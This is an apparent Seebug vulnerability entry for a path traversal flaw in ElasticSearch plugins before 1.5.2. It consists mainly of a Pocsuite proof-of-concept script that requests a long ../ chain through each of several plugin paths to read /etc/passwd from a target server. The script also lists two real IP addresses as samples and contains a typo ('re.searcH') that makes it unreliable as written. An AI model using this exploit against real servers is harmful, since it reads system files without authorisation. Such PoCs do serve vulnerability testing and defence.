ElasticSearch < 1.4.5 / < 1.5.2 - Path Transversal

2015-08-31T00:00:00
ID SSV:89268
Type seebug
Reporter Root
Modified 2015-08-31T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# -*- coding: UTF-8 -*-

import re

from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '89268'
    version = '1'
    vulDate = '1431878400'
    createDate = '1442937600'
    references = ['http://www.sebug.net/vuldb/ssvid-89268']
    name = 'ElasticSearch < 1.5.2 由插件导致的目录遍历'
    appPowerLink = 'https://www.elastic.co'
    appName = 'ElasticSearch多个插件'
    appVersion = '< 1.5.2'
    vulType = 'Path Transversal'
    desc = 'ElasticSearch部分插件存在缺陷导致目录遍历'
    samples = ['']
    sample_not_vul = ['http://62.75.150.124:9200','http://62.75.216.144:9200']

    def _attack(self):
        return self._verify()

    def _verify(self, verify=True):
        pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']
        result = {}
        for plugin in pluginList:
            vul_url = '%s/_plugin/%s/../../../../../../../../../../../../../../../../etc/passwd' % (self.url , plugin)
            response = req.get(vul_url, timeout=10).content

            if re.searcH('root(:([0-9a-zA-Z\/\*\-\s]+)){6}', response):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_url

                result['FileInfo'] = {}
                result['FileInfo']['Filename'] = 'plugin name:' + plugin

                break

        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output


register(TestPOC)